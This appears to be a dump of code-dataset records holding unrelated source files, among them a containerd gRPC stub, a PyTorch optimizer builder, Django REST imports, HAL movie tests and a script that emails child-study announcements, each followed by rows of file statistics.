raise NotImplementedError('Method not implemented!')
def List(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_NamespacesServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.GetNamespaceRequest.FromString,
response_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.GetNamespaceResponse.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.ListNamespacesRequest.FromString,
response_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.ListNamespacesResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.CreateNamespaceRequest.FromString,
response_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.CreateNamespaceResponse.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.UpdateNamespaceRequest.FromString,
response_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.UpdateNamespaceResponse.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.DeleteNamespaceRequest.FromString,
response_serializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'containerd.services.namespaces.v1.Namespaces', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 48.757353 | 137 | 0.797316 | 759 | 6,631 | 6.575758 | 0.15942 | 0.057303 | 0.079944 | 0.091364 | 0.858946 | 0.837908 | 0.837908 | 0.79984 | 0.742737 | 0.742737 | 0 | 0.008792 | 0.142362 | 6,631 | 135 | 138 | 49.118519 | 0.868824 | 0.189263 | 0 | 0.287356 | 1 | 0 | 0.104371 | 0.05633 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08046 | false | 0.057471 | 0.034483 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
59ce35548e2efa26b53c7532f6215c77043aa282 | 4,464 | py | Python | solver/build.py | huangzongheng/NAMA | e9bc5b9ca0c1dd5fff2f0613fdaac9fc5b038152 | [
"MIT"
] | null | null | null | solver/build.py | huangzongheng/NAMA | e9bc5b9ca0c1dd5fff2f0613fdaac9fc5b038152 | [
"MIT"
] | null | null | null | solver/build.py | huangzongheng/NAMA | e9bc5b9ca0c1dd5fff2f0613fdaac9fc5b038152 | [
"MIT"
] | null | null | null | # encoding: utf-8
"""
@author: sherlock
@contact: sherlockliao01@gmail.com
"""
import torch
from .ranger import Ranger
def make_optimizer(cfg, model):
# fix backbone
for key, value in model.named_parameters():
if cfg.SOLVER.TRAIN_MODE == 'all':
break
elif cfg.SOLVER.TRAIN_MODE == 'base':
if 'affine' in key:
value.requires_grad_(False)
elif cfg.SOLVER.TRAIN_MODE == 'affine':
if 'affine' not in key:
value.requires_grad_(False)
else:
break
# if not value.requires_grad:
# continue
params = []
for key, value in model.named_parameters():
if not value.requires_grad:
continue
lr = cfg.SOLVER.BASE_LR
weight_decay = cfg.SOLVER.WEIGHT_DECAY
if "bias" in key:
lr = cfg.SOLVER.BASE_LR * cfg.SOLVER.BIAS_LR_FACTOR
weight_decay = cfg.SOLVER.WEIGHT_DECAY_BIAS
if "uc_k" in key:
weight_decay = cfg.SOLVER.WEIGHT_DECAY_POLY
if "neck" in key or "classifier" in key:
weight_decay = cfg.SOLVER.WEIGHT_DECAY_NECK
if "bn_f" in key:
weight_decay = 0 # cfg.SOLVER.WEIGHT_DECAY_NECK
# elif "head" in key:
# lr = cfg.SOLVER.BASE_LR * 10
# weight_decay = cfg.SOLVER.WEIGHT_DECAY_BIAS
# elif "attention.1" in key:
# lr = cfg.SOLVER.BASE_LR * 10
# weight_decay = cfg.SOLVER.WEIGHT_DECAY_BIAS
params += [{"params": [value], "lr": lr, "weight_decay": weight_decay}]
if cfg.SOLVER.OPTIMIZER_NAME == 'SGD':
optimizer = getattr(torch.optim, cfg.SOLVER.OPTIMIZER_NAME)(params, momentum=cfg.SOLVER.MOMENTUM)
else:
optimizer = getattr(torch.optim, cfg.SOLVER.OPTIMIZER_NAME)(params)
return optimizer
def make_optimizer_with_center(cfg, model, center_criterion):
params = []
for key, value in model.named_parameters():
if not value.requires_grad:
continue
lr = cfg.SOLVER.BASE_LR
weight_decay = cfg.SOLVER.WEIGHT_DECAY
if "bias" in key:
lr = cfg.SOLVER.BASE_LR * cfg.SOLVER.BIAS_LR_FACTOR
weight_decay = cfg.SOLVER.WEIGHT_DECAY_BIAS
params += [{"params": [value], "lr": lr, "weight_decay": weight_decay}]
if cfg.SOLVER.OPTIMIZER_NAME == 'SGD':
optimizer = getattr(torch.optim, cfg.SOLVER.OPTIMIZER_NAME)(params, momentum=cfg.SOLVER.MOMENTUM)
else:
optimizer = getattr(torch.optim, cfg.SOLVER.OPTIMIZER_NAME)(params)
optimizer_center = torch.optim.SGD(center_criterion.parameters(), lr=cfg.SOLVER.CENTER_LR)
return optimizer, optimizer_center
def make_optimizer_region(cfg, model):
# fix backbone
for key, value in model.named_parameters():
if cfg.SOLVER.TRAIN_MODE == 'all':
# for fix_layer in cfg.SOLVER.FIXED_LAYER: # freeze certain layers
# if fix_layer in key:
# value.requires_grad_(False)
break
# elif cfg.SOLVER.TRAIN_MODE == 'base':
# if 'head' in key:
# value.requires_grad_(False)
elif cfg.SOLVER.TRAIN_MODE == 'head':
if 'head' not in key:
value.requires_grad_(False)
else:
break
# if not value.requires_grad:
# continue
params = []
for key, value in model.named_parameters():
# if not value.requires_grad:
# continue
lr = cfg.SOLVER.BASE_LR
weight_decay = cfg.SOLVER.WEIGHT_DECAY
if "bias" in key:
lr = cfg.SOLVER.BASE_LR * cfg.SOLVER.BIAS_LR_FACTOR
weight_decay = cfg.SOLVER.WEIGHT_DECAY_BIAS
elif "head" in key:
lr = cfg.SOLVER.BASE_LR * cfg.SOLVER.HEAD_LR_FACTOR
weight_decay = cfg.SOLVER.WEIGHT_DECAY_BIAS
params += [{"params": [value], "lr": lr, "weight_decay": weight_decay}]
if cfg.SOLVER.OPTIMIZER_NAME == 'SGD':
optimizer = getattr(torch.optim, cfg.SOLVER.OPTIMIZER_NAME)(params, momentum=cfg.SOLVER.MOMENTUM)
else:
optimizer = getattr(torch.optim, cfg.SOLVER.OPTIMIZER_NAME)(params)
return optimizer
def freeze_specified_layers(model, layers):
for key, value in model.named_parameters():
for fix_layer in layers: # freeze certain layers
if fix_layer in key:
value.requires_grad_(False)
| 38.482759 | 105 | 0.614247 | 560 | 4,464 | 4.692857 | 0.135714 | 0.15411 | 0.0586 | 0.091324 | 0.825342 | 0.814688 | 0.814688 | 0.802131 | 0.748097 | 0.730213 | 0 | 0.002818 | 0.284498 | 4,464 | 115 | 106 | 38.817391 | 0.819975 | 0.158378 | 0 | 0.707317 | 0 | 0 | 0.038379 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04878 | false | 0 | 0.02439 | 0 | 0.109756 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
abd2c4645fb38a8fc9c4c76cce988c2c36ad295c | 2,317 | py | Python | tests/items/genericitem_test.py | psiopic2/psicrawler | bb6078446c6f5b7e7a7b80264bdbcbbebc5265db | [
"MIT"
] | null | null | null | tests/items/genericitem_test.py | psiopic2/psicrawler | bb6078446c6f5b7e7a7b80264bdbcbbebc5265db | [
"MIT"
] | null | null | null | tests/items/genericitem_test.py | psiopic2/psicrawler | bb6078446c6f5b7e7a7b80264bdbcbbebc5265db | [
"MIT"
] | null | null | null | from psicrawler.items import GenericItem
from psicrawler.items import from_xml
def test_xml_generation_with_topics():
expected_xml = """<?xml version="1.0" encoding="utf-8"?>
<document>
<title>Foobar</title>
<url>http://foobar</url>
<topics>
<topic>Topic 1</topic>
<topic>Topic 2</topic>
</topics>
<source>foobar</source>
<text><![CDATA[wharblegarble]]></text>
</document>"""
i = GenericItem()
i['title'] = 'Foobar'
i['url'] = 'http://foobar'
i['source'] = 'foobar'
i['topics'] = ('Topic 1', 'Topic 2')
i['text'] = 'wharblegarble'
assert i.asXml() == expected_xml
def test_xml_generation_without_topics():
expected_xml = """<?xml version="1.0" encoding="utf-8"?>
<document>
<title>Foobar</title>
<url>http://foobar</url>
<topics>
</topics>
<source>foobar</source>
<text><![CDATA[wharblegarble]]></text>
</document>"""
i = GenericItem()
i['title'] = 'Foobar'
i['url'] = 'http://foobar'
i['source'] = 'foobar'
i['topics'] = ()
i['text'] = 'wharblegarble'
assert i.asXml() == expected_xml
def test_item_from_xml_with_topics(tmpdir):
xml = """<?xml version="1.0" encoding="utf-8"?>
<document>
<title>Foobar</title>
<url>http://foobar</url>
<topics>
<topic>Topic 1</topic>
<topic>Topic 2</topic>
</topics>
<source>foobar</source>
<text><![CDATA[wharblegarble]]></text>
</document>"""
p = tmpdir.mkdir('fixtures').join('itemxml.xml')
p.write(xml)
i = from_xml(str(p))
assert i['title'] == 'Foobar'
assert i['url'] == 'http://foobar'
assert i['source'] == 'foobar'
assert i['text'] == 'wharblegarble'
assert i['topics'][0] == 'Topic 1'
assert i['topics'][1] == 'Topic 2'
def test_item_from_xml_without_topics(tmpdir):
xml = """<?xml version="1.0" encoding="utf-8"?>
<document>
<title>Foobar</title>
<url>http://foobar</url>
<topics>
</topics>
<source>foobar</source>
<text><![CDATA[wharblegarble]]></text>
</document>"""
p = tmpdir.mkdir('fixtures').join('itemxml.xml')
p.write(xml)
i = from_xml(str(p))
assert i['title'] == 'Foobar'
assert i['url'] == 'http://foobar'
assert i['source'] == 'foobar'
assert i['text'] == 'wharblegarble'
assert i['topics'] == ()
| 24.135417 | 60 | 0.589555 | 288 | 2,317 | 4.65625 | 0.145833 | 0.06786 | 0.077554 | 0.04176 | 0.90604 | 0.857569 | 0.857569 | 0.857569 | 0.857569 | 0.857569 | 0 | 0.011758 | 0.19249 | 2,317 | 95 | 61 | 24.389474 | 0.704971 | 0 | 0 | 0.857143 | 0 | 0 | 0.533679 | 0.141623 | 0 | 0 | 0 | 0 | 0.168831 | 1 | 0.051948 | false | 0 | 0.025974 | 0 | 0.077922 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
abdbfe9e4c5a7426cf54e8be2d550b300bb71a94 | 506 | py | Python | src/project/rest_views/__init__.py | loganathanengrr/Django-Rest-Core | 928c2d816c0aa48453dde8642ef1b263f76ae39d | [
"MIT"
] | 1 | 2020-02-18T11:09:56.000Z | 2020-02-18T11:09:56.000Z | src/project/rest_views/__init__.py | loganathanengrr/Django-Rest-Core | 928c2d816c0aa48453dde8642ef1b263f76ae39d | [
"MIT"
] | 8 | 2020-02-11T23:20:50.000Z | 2022-03-11T23:32:18.000Z | src/project/rest_views/__init__.py | loganathanengrr/Django-Rest-Core | 928c2d816c0aa48453dde8642ef1b263f76ae39d | [
"MIT"
] | null | null | null | from .views import (
GenericAPIView,
CreateAPIView,
ListAPIView,
RetrieveAPIView,
UpdateAPIView,
DestroyAPIView,
ListCreateAPIView,
RetrieveUpdateAPIView,
RetrieveDestroyAPIView,
RetrieveUpdateDestroyAPIView,
)
from rest_framework.views import APIView
__all__ = [
'APIView',
'GenericAPIView',
'CreateAPIView',
'ListAPIView',
'RetrieveAPIView',
'UpdateAPIView',
'DestroyAPIView',
'ListCreateAPIView',
'RetrieveUpdateAPIView',
'RetrieveDestroyAPIView',
'RetrieveUpdateDestroyAPIView',
] | 19.461538 | 40 | 0.79249 | 31 | 506 | 12.774194 | 0.548387 | 0.055556 | 0.191919 | 0.267677 | 0.848485 | 0.848485 | 0.848485 | 0.848485 | 0.848485 | 0.848485 | 0 | 0 | 0.108696 | 506 | 26 | 41 | 19.461538 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0.345168 | 0.140039 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
abff5a57909b49b37c306a944f102e1c2ec8309a | 212 | py | Python | examples/__init__.py | eager-dev/eagerx_pybullet | a67c14399564c4c261d1d4f6512380697a043e27 | [
"Apache-2.0"
] | 1 | 2022-03-24T12:14:21.000Z | 2022-03-24T12:14:21.000Z | examples/objects/__init__.py | eager-dev/eagerx_pybullet | a67c14399564c4c261d1d4f6512380697a043e27 | [
"Apache-2.0"
] | 1 | 2022-03-29T14:33:23.000Z | 2022-03-29T14:33:23.000Z | examples/objects/__init__.py | eager-dev/eagerx_pybullet | a67c14399564c4c261d1d4f6512380697a043e27 | [
"Apache-2.0"
] | null | null | null | import examples.objects.vx300s # noqa # pylint: disable=unused-import
import examples.objects.solid # noqa # pylint: disable=unused-import
import examples.objects.camera # noqa # pylint: disable=unused-import
| 53 | 70 | 0.787736 | 27 | 212 | 6.185185 | 0.37037 | 0.251497 | 0.377246 | 0.413174 | 0.772455 | 0.598802 | 0.598802 | 0.598802 | 0 | 0 | 0 | 0.015957 | 0.113208 | 212 | 3 | 71 | 70.666667 | 0.87234 | 0.504717 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e605e501f83de5552072cd8685db03d6b8e465e2 | 2,072 | py | Python | storm_control/test/test_hal_tcp_tm.py | shiwei23/STORM6 | 669067503ebd164b575ce529fcc4a9a3f576b3d7 | [
"MIT"
] | 47 | 2015-02-11T16:05:54.000Z | 2022-03-26T14:13:12.000Z | storm_control/test/test_hal_tcp_tm.py | shiwei23/STORM6 | 669067503ebd164b575ce529fcc4a9a3f576b3d7 | [
"MIT"
] | 110 | 2015-01-30T03:53:41.000Z | 2021-11-03T15:58:44.000Z | storm_control/test/test_hal_tcp_tm.py | shiwei23/STORM6 | 669067503ebd164b575ce529fcc4a9a3f576b3d7 | [
"MIT"
] | 61 | 2015-01-09T18:31:27.000Z | 2021-12-21T13:07:51.000Z | #!/usr/bin/env python
"""
Test taking movies.
"""
from storm_control.test.hal.standardHalTest import halTest
def test_hal_tcp_tm_1():
halTest(config_xml = "none_tcp_config.xml",
class_name = "TakeMovie1",
test_module = "storm_control.test.hal.tcp_tests")
def test_hal_tcp_tm_2():
halTest(config_xml = "none_tcp_config.xml",
class_name = "TakeMovie2",
test_module = "storm_control.test.hal.tcp_tests")
def test_hal_tcp_tm_3():
halTest(config_xml = "none_tcp_config.xml",
class_name = "TakeMovie3",
test_module = "storm_control.test.hal.tcp_tests")
def test_hal_tcp_tm_4():
halTest(config_xml = "none_tcp_config.xml",
class_name = "TakeMovie4",
test_module = "storm_control.test.hal.tcp_tests")
def test_hal_tcp_tm_5():
halTest(config_xml = "none_tcp_config.xml",
class_name = "TakeMovie5",
test_module = "storm_control.test.hal.tcp_tests")
def test_hal_tcp_tm_6():
halTest(config_xml = "none_tcp_config.xml",
class_name = "TakeMovie6",
test_module = "storm_control.test.hal.tcp_tests")
def test_hal_tcp_tm_7():
halTest(config_xml = "none_tcp_config.xml",
class_name = "TakeMovie7",
test_module = "storm_control.test.hal.tcp_tests")
def test_hal_tcp_tm_8():
halTest(config_xml = "none_tcp_config.xml",
class_name = "TakeMovie8",
test_module = "storm_control.test.hal.tcp_tests")
def test_hal_tcp_tm_9():
halTest(config_xml = "none_tcp_config.xml",
class_name = "TakeMovie9",
test_module = "storm_control.test.hal.tcp_tests")
def test_hal_tcp_tm_10():
halTest(config_xml = "none_tcp_config.xml",
class_name = "TakeMovie10",
test_module = "storm_control.test.hal.tcp_tests")
def test_hal_tcp_tm_11():
halTest(config_xml = "none_tcp_config_spot_counter.xml",
class_name = "TakeMovie11",
test_module = "storm_control.test.hal.tcp_tests")
| 25.268293 | 61 | 0.658784 | 281 | 2,072 | 4.41637 | 0.170819 | 0.129734 | 0.177276 | 0.183723 | 0.814666 | 0.802579 | 0.77921 | 0.77921 | 0.749396 | 0.419017 | 0 | 0.01625 | 0.227799 | 2,072 | 81 | 62 | 25.580247 | 0.759375 | 0.019305 | 0 | 0.466667 | 0 | 0 | 0.338933 | 0.189723 | 0 | 0 | 0 | 0 | 0 | 1 | 0.244444 | true | 0 | 0.022222 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
55492e5c28c92157abe70c0fe97c38f36d77a856 | 129 | py | Python | pyleecan/Methods/Machine/Conductor/__init__.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 95 | 2019-01-23T04:19:45.000Z | 2022-03-17T18:22:10.000Z | pyleecan/Methods/Machine/Conductor/__init__.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 366 | 2019-02-20T07:15:08.000Z | 2022-03-31T13:37:23.000Z | pyleecan/Methods/Machine/Conductor/__init__.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 74 | 2019-01-24T01:47:31.000Z | 2022-02-25T05:44:42.000Z | from ....Methods.Machine.LamSlotWind import Lam_WindCheckError
class CondCheckError(Lam_WindCheckError):
""" """
pass
| 16.125 | 62 | 0.728682 | 12 | 129 | 7.666667 | 0.833333 | 0.369565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155039 | 129 | 7 | 63 | 18.428571 | 0.844037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
55625d49b92806387264348b3601b56cf5b5d860 | 19,035 | py | Python | scripts/send_current_announcements.py | kimberscott/lookit-data-processing | c975d14bc94fd148212b22aa2fc7e4d1d38ebb35 | [
"MIT"
] | null | null | null | scripts/send_current_announcements.py | kimberscott/lookit-data-processing | c975d14bc94fd148212b22aa2fc7e4d1d38ebb35 | [
"MIT"
] | 2 | 2021-04-30T20:31:29.000Z | 2021-11-15T17:46:44.000Z | scripts/send_current_announcements.py | kimberscott/lookit-data-processing | c975d14bc94fd148212b22aa2fc7e4d1d38ebb35 | [
"MIT"
] | 1 | 2018-06-20T19:48:41.000Z | 2018-06-20T19:48:41.000Z | from announcements import send_announcement_emails
# THINKING ABOUT FRIENDSHIP ONLY
# ageRangeDays = (365*3, 365*4)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentfriendshipannouncement.txt'
# expId = '410dea98-b147-402e-ac37-1ccd05e2a9e0'
# studyName = 'Thinking about Friendship'
# studyMessage = "This study investigates how children expect people to act toward one another. Your child will see a series of questions where they are told about one character who is performing a behavior, and they need to guess who is the recipient of that behavior from the options on the screen. After you participate, we will email you a $5 Amazon gift card as a thank-you (one gift card per child)!<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/410dea98-b147-402e-ac37-1ccd05e2a9e0/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 3 through 7 years old? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# THINKING ABOUT FRIENDSHIP AND ZOOM STUDY
# ageRangeDays = (365*4, 365*8)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentfriendshipannouncement.txt'
# expId = '410dea98-b147-402e-ac37-1ccd05e2a9e0'
# studyName = 'Thinking about Friendship'
# studyMessage = "This study investigates how children expect people to act toward one another. Your child will see a series of questions where they are told about one character who is performing a behavior, and they need to guess who is the recipient of that behavior from the options on the screen. After you participate, we will email you a $5 Amazon gift card as a thank-you (one gift card per child)!<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/410dea98-b147-402e-ac37-1ccd05e2a9e0/' target=_blank>the study</a> on Lookit!<br><br>We also wanted to let you know about an opportunity to participate in a live study for kids age 4-11, run by our colleague Sydney Levine at Harvard:<br><br>We've just started a new study looking at how children make ethical decisions. Even though it's not always obvious, we think that even very young kids can make sophisticated judgments about right and wrong. That's where you come in! We are conducting a fun study where we tell kids short stories and ask them some questions. We're trying to get as many children as possible to participate! The study takes no longer than 15 minutes to complete and will take place on the Zoom platform. <br><br>How to sign up: <br><br>Your child must be 4-11 years old. You can reserve a spot for our study by <a href='https://calendly.com/harvard-kids/30min'>signing up on the study calendar</a>. We'll send you more information once you sign up on what to expect during the study. <br><br>You can find more information about our project <a href='https://calendly.com/harvard-kids/30min'>here</a>. If you have any questions, do not hesitate to email harvard.kids.study@gmail.com!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 3 through 11 years old? We'd be grateful for any help spreading the word about these studies!<br><br><hr>"
# maxToSend = 2000
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# Lets Draw only
ageRangeDays = (365*4, 365*8)
logfilename = '/Users/kms/lookit-v2/scripts/logs/sentdrawingannouncement.txt'
expId = '0774c820-7912-45cd-a9f8-d8e13220e5ac'
studyName = "Let's Draw!"
studyMessage = "This study investigates how children think about and capture space by looking at how they draw. Your child will watch a short video about a girl named Ana performing some actions. Then your child will draw what Ana was interacting with. To participate, your child will need two blank sheets of white 8.5 x 11 paper (Letter Sized) and a regular pencil with an eraser, and will need to be on a computer (rather than a phone/tablet). After you participate, we will email you a $5 Amazon gift card as a thank-you (one gift card per child)!<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/0774c820-7912-45cd-a9f8-d8e13220e5ac/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 4 through 9 years old? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
maxToSend = 1000
emails = 'all' # 'all'/list of emails
send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# Let's draw and zoom study
ageRangeDays = (365*8, 365*10)
logfilename = '/Users/kms/lookit-v2/scripts/logs/sentdrawingannouncement.txt'
expId = '0774c820-7912-45cd-a9f8-d8e13220e5ac'
studyName = "Let's Draw!"
studyMessage = "This study investigates how children think about and capture space by looking at how they draw. Your child will watch a short video about a girl named Ana performing some actions. Then your child will draw what Ana was interacting with. To participate, your child will need two blank sheets of white 8.5 x 11 paper (Letter Sized) and a regular pencil with an eraser, and will need to be on a computer (rather than a phone/tablet). After you participate, we will email you a $5 Amazon gift card as a thank-you (one gift card per child)!<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/0774c820-7912-45cd-a9f8-d8e13220e5ac/' target=_blank>the study</a> on Lookit!<br><br>We also wanted to let you know about a separate opportunity to participate in a live study for kids age 4-11, run by our colleague Sydney Levine at Harvard:<br><br>We've just started a new study looking at how children make ethical decisions. Even though it's not always obvious, we think that even very young kids can make sophisticated judgments about right and wrong. That's where you come in! We are conducting a fun study where we tell kids short stories and ask them some questions. We're trying to get as many children as possible to participate! The study takes no longer than 15 minutes to complete and will take place on the Zoom platform. <br><br>How to sign up: <br><br>Your child must be 4-11 years old. You can reserve a spot for our study by <a href='https://calendly.com/harvard-kids/30min'>signing up on the study calendar</a>. We'll send you more information once you sign up on what to expect during the study. <br><br>You can find more information about our project <a href='https://calendly.com/harvard-kids/30min'>here</a>. If you have any questions, do not hesitate to email harvard.kids.study@gmail.com!<br><br>Happy experimenting!<br><br>For even more ways to contribute to science from home, check out <a href='https://childrenhelpingscience.com/'>Children Helping Science</a>, a clearinghouse for online research about children and families.<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 4 through 11 years old? We'd be grateful for any help spreading the word about these studies!<br><br><hr>"
maxToSend = 1000
emails = 'all' # 'all'/list of emails
send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# WORDS AND OBJECTS
# ageRangeDays = (9 * 30, 365 + 7 * 30 + 6)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentwordsobjectsannouncement.txt'
# expId = '0574c4e1-2d0a-444d-9225-082d58d7ad7e'
# studyName = 'Words and Objects'
# studyMessage = "This study from the Stanford Language and Cognition Lab is about how babies form categories of objects. We're interested whether hearing verbal labels ('look, a doggie!') influences this learning process. your baby will see eight objects along with either beeps or words. Then, we will measure his or her looking time to objects from that new category vs. familiar objects. By examining which objects babies choose to look at during this study, we can start to uncover how babies find structure in the world around them - and how what you say to them helps! You will receive a $5 Amazon gift card to thank you for your participation.<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/0574c4e1-2d0a-444d-9225-082d58d7ad7e/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 9 - 18 months old? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# WORDS AND OBJECTS
# ageRangeDays = (9 * 30, 365 + 7 * 30 + 6)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentwordsobjectsannouncement.txt'
# expId = '0574c4e1-2d0a-444d-9225-082d58d7ad7e'
# studyName = 'Words and Objects'
# studyMessage = "This study from the Stanford Language and Cognition Lab is about how babies form categories of objects. We're interested whether hearing verbal labels ('look, a doggie!') influences this learning process. your baby will see eight objects along with either beeps or words. Then, we will measure his or her looking time to objects from that new category vs. familiar objects. By examining which objects babies choose to look at during this study, we can start to uncover how babies find structure in the world around them - and how what you say to them helps! You will receive a $5 Amazon gift card to thank you for your participation.<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/0574c4e1-2d0a-444d-9225-082d58d7ad7e/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 9 - 18 months old? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# GEOMETRY
# ageRangeDays = (198, 229)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentgeometryannouncement.txt'
# expId = '849b547f-5199-4aa0-892d-a96262080dc8'
# studyName = 'Baby Euclid'
